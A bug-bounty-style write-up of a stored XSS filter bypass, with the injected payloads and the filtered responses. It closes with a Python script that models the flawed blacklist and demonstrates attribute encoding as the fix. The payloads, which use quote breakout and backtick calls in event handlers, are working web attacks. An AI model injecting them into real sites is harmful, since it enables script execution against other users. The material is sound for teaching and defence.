Story Of a Stored XSS Bypass

Hi readers,

I am a cyber security researcher from Bangladesh. This is my first write-up, and I am not good at XSS, so please forgive any mistakes.

Recently I was testing a private site where users can add their personal information. I noticed an input there named Secret Key, which allows the user to process payments and store transaction information in an application.

So I entered a normal payload :-

"><img src=x onerror=prompt(document.domain)>

and it got filtered; the page source looked like :-

<input type="text" id="****" name="****" value="">&lt;img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So from the source I understood that :-

1. The double quote (") and greater-than (>) signs are not being filtered properly.
2. Malicious tags are being filtered; that is why <img> became img img.

So I had two possible ways to execute JavaScript. The first was to somehow bypass the less-than (<) filter, and the second was to add a malicious HTML attribute to execute JavaScript. I tried many ways to bypass the less-than (<) character but was unable to, so I proceeded with the second way by adding a malicious HTML attribute. I entered the payload below :-

" OnMouseOver=prompt(1)

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt&#40;" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So I was able to add an HTML attribute, but brackets are being filtered properly (the parenthesis came back encoded as &#40;). So I entered the payload below :-

" OnMouseOver=prompt`1`

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

But the code was not executed. Take a closer look: the payload just needs a double quote (") after the = 🤔🤔🤔. Without it, the unquoted attribute value runs right up to and includes the page's own closing quote, so the handler body is not valid JavaScript :-

" OnMouseOver="prompt`1`

Response was :-

<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

Looks good. Now I moved my mouse pointer over the input, and the OnMouseOver event fired the XSS popup 🤩🤩🤩

XSS Executed .
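As an added illustration (my own code, not the author's and not the site's real filter), the Python script below models the blacklist assumed from the responses above, shows why the unquoted payload produced a handler whose JavaScript body was broken by the stray quote, and shows that encoding the value for the attribute context (html.escape with quote=True) prevents the attribute injection altogether. The template, the filter approximation and the attribute names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed template mirroring the responses in the write-up: the submitted
# value is reflected inside the double-quoted value="" attribute of an <input>.
TEMPLATE = ('<input type="text" id="secret" name="secret" value="{value}" '
            'class="form-control" rel="gp" data-size="20">')

def flawed_filter(value: str) -> str:
    """Assumed approximation of the site's blacklist (not its real code):
    '<' and parentheses are entity-encoded, but '"' is left alone, so a value
    can still close the attribute and start a new one."""
    return (value.replace("<", "&lt;")
                 .replace("(", "&#40;")
                 .replace(")", "&#41;"))

def safe_attr_encode(value: str) -> str:
    """Context-aware encoding for a double-quoted attribute: html.escape with
    quote=True also turns '"' into &quot;, so the value cannot break out."""
    return html.escape(value, quote=True)

class _InputAttrs(HTMLParser):
    """Collect the attributes a browser-like parser assigns to the <input>."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def event_handlers(value: str, encoder) -> dict:
    """Render value through encoder and return the on* attributes (name ->
    JavaScript body) that end up on the <input>; an empty dict means no injection."""
    parser = _InputAttrs()
    parser.feed(TEMPLATE.format(value=encoder(value)))
    return {k: v for k, v in parser.attrs.items() if k.startswith("on")}

# Payloads from the write-up; backticks sidestep the encoded parentheses.
UNQUOTED = '" OnMouseOver=prompt`1`'
QUOTED = '" OnMouseOver="prompt`1`'

if __name__ == "__main__":
    # Unquoted: the handler exists, but its bare value swallows the template's
    # closing quote, so the body is prompt`1`" (a syntax error) and never runs.
    print(event_handlers(UNQUOTED, flawed_filter))   # {'onmouseover': 'prompt`1`"'}
    # Quoted: a clean handler body; hovering the input runs prompt`1`.
    print(event_handlers(QUOTED, flawed_filter))     # {'onmouseover': 'prompt`1`'}
    # Proper attribute encoding: no injected attribute at all.
    print(event_handlers(QUOTED, safe_attr_encode))  # {}
```

The same event_handlers check can be run over a site's rendered responses as a regression test: any non-empty result for user-supplied input means the attribute context is not being encoded.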

Thanks for reading. I hope I will get time to write some more posts.